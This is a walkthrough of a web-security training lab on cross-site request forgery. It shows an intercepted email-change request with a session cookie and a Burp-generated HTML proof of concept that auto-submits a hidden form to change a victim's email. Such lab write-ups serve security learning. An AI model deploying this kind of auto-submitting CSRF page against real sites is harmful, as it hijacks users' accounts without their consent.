CSRF vulnerability with no defenses

Description

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.

You can log in to your own account using the following credentials: wiener:peter

Approach

After accessing the lab, I intercepted the change email request and sent it to the repeater in Burp Suite:

POST /my-account/change-email HTTP/1.1
Host: 0a82009c0322bb4484beb90e00980091.web-security-academy.net
Cookie: session=N175cbqXv2yEe97sAbA1PpVmMwWts5tE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

email=qwe%40qwe.com

My goal was to change the victim's email address, so I decided to host a malicious page that would automatically submit the change email form from the lab when accessed. First, I needed to craft a CSRF exploit, and to do that, I used the CSRF PoC generator built into Burp Suite Professional, which is very useful and saves time, though it’s possible to write the PoC manually.

By right-clicking the request and selecting Engagement tools / Generate CSRF PoC, I generated the following HTML:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a82009c0322bb4484beb90e00980091.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacked&#64;ichyaboy&#46;htb" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

I modified the email value to a new one to avoid any issues indicating that the email was already in use. Then, I copied and pasted this HTML into my exploit server.

After clicking Store and Deliver exploit to victim, I saw that the lab was solved, confirming the change of the victim's email.